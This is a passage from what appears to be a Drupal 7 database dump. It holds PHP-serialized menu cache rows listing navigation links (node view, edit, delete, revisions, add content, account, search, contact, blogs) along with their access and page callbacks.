tips\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"4\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:16:\"filter_tips_long\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"filter/tips\";s:5:\"title\";s:12:\"Compose tips\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:5;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"5\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/%\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:0:\"\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:5:{i:38;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"38\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:13:\"node/%/delete\";s:11:\"router_path\";s:13:\"node/%/delete\";s:10:\"link_title\";s:6:\"Delete\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"38\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:31:\"a:2:{i:0;s:6:\"delete\";i:1;i:1;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:45:\"a:2:{i:0;s:19:\"node_delete_confirm\";i:1;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:6:\"Delete\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:41;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"41\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:11:\"node/%/edit\";s:11:\"router_path\";s:11:\"node/%/edit\";s:10:\"link_title\";s:4:\"Edit\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"41\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:31:\"a:2:{i:0;s:6:\"update\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_edit\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:52;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"52\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:16:\"node/%/revisions\";s:11:\"router_path\";s:16:\"node/%/revisions\";s:10:\"link_title\";s:9:\"Revisions\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"52\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"_node_revision_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:22:\"node_revision_overview\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:9:\"Revisions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:62;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"62\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:11:\"node/%/view\";s:11:\"router_path\";s:11:\"node/%/view\";s:10:\"link_title\";s:4:\"View\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"62\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:406;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"406\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:12:\"node/%/track\";s:11:\"router_path\";s:12:\"node/%/track\";s:10:\"link_title\";s:5:\"Track\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:3:\"406\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_node_tracker\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:5:\"Track\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:6;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"6\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:8:\"node/add\";s:11:\"router_path\";s:8:\"node/add\";s:10:\"link_title\";s:11:\"Add content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"6\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"_node_add_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:13:\"node_add_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:8:\"node/add\";s:5:\"title\";s:11:\"Add content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:17;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"17\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"user/%\";s:11:\"router_path\";s:6:\"user/%\";s:10:\"link_title\";s:10:\"My account\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"17\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_view_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:14:\"user_view_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:10:\"My account\";s:14:\"title_callback\";s:15:\"user_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:23;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"23\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"comment/reply/%\";s:11:\"router_path\";s:15:\"comment/reply/%\";s:10:\"link_title\";s:15:\"Add new comment\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"23\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:2;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:2;}\";s:13:\"page_callback\";s:13:\"comment_reply\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"comment/reply/%\";s:5:\"title\";s:15:\"Add new comment\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:27;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"27\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"taxonomy/term/%\";s:11:\"router_path\";s:15:\"taxonomy/term/%\";s:10:\"link_title\";s:13:\"Taxonomy term\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"27\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:13:\"Taxonomy term\";s:14:\"title_callback\";s:19:\"taxonomy_term_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:187;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"187\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"search\";s:11:\"router_path\";s:6:\"search\";s:10:\"link_title\";s:6:\"Search\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"187\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"search_is_active\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"search_view\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"search\";s:5:\"title\";s:6:\"Search\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:399;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"399\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:7:\"contact\";s:11:\"router_path\";s:7:\"contact\";s:10:\"link_title\";s:7:\"Contact\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"399\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"access site-wide contact form\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:35:\"a:1:{i:0;s:17:\"contact_site_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:7:\"contact\";s:5:\"title\";s:7:\"Contact\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:504;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"504\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"blog\";s:11:\"router_path\";s:4:\"blog\";s:10:\"link_title\";s:5:\"Blogs\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"504\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:14:\"blog_page_last\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"blog\";s:5:\"title\";s:5:\"Blogs\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444940212,1),('links:shortcut-set-1:page:admin/reports/dblog:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940177,1),('links:shortcut-set-1:page:admin/structure/block/manage/block/1/configure:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1447855439,1),('links:shortcut-set-1:page:node/4/edit:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445260041,1),('links:shortcut-set-1:page:node/4:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940212,1),('links:shortcut-set-1:page:node/5:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940217,1),('links:shortcut-set-1:page:node/6:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940220,1),('links:shortcut-set-1:page:node/7:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940233,1),('links:shortcut-set-1:page:node:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940208,1),('links:shortcut-set-1:page:taxonomy/term/1:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445260221,1),('links:shortcut-set-1:tree-data:en:9bd1605e2280833450478f9083b7f8714c2fa28f1012455e2744e5af1a13eec5','a:2:{s:4:\"tree\";a:2:{i:216;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:14:\"shortcut-set-1\";s:4:\"mlid\";s:3:\"216\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:8:\"node/add\";s:11:\"router_path\";s:8:\"node/add\";s:10:\"link_title\";s:11:\"Add 